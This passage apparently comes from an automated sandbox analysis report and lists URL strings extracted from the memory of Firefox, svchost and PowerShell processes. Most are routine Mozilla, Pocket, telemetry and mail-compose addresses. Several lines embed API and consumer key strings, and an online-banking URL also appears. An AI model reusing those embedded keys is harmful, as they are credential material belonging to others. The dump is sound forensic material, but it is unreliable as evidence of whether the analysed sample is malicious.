Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3241215258.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3266404421.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000003.3115376435.000001A8C35FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3116798829.000001A8B716B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000010.00000002.3319593881.000001A8B4F50000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1AIzaSyB2h2OuRcUgy5N-5hsZqiPW6sH3n_rptiQ
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1AIzaSyB2h2OuRcUgy5N-5hsZqiPW6sH3n_rptiQParent
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: svchost.exe, 0000000C.00000003.2982483521.00000297488B3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000C.00000003.2982483521.0000029748840000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3241215258.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3266404421.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239864513.000001A8BFFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239864513.000001A8BFFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239864513.000001A8BFFF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000010.00000003.3180111409.000001A8C3217000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000010.00000003.3180111409.000001A8C3217000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/aboutConfigPrefs.jsonexperiment-apis/
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.comrward-
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Updates
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B612E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3216975077.000001A8B3E71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3223260101.000001A8B8239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3210441384.000001A8B3E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsync
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000010.00000003.3238252370.000001A8C3AB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3234183339.000001A8C3AB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetry
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000010.00000003.3262588896.000001A8B83C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000010.00000003.3273318626.000001A8B8304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/1097c845-c431-43a5-a65c-3382b
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/7755ad51-2370-4623-
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/6d7eb9ba-6a74-433e-8595-8295
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/a8e29def-355a-4f78
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/cd4ae739-6293-4846
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3323580066.000001A8B650A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%ssetSlowScriptDebugHandler/debugService.activationH
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
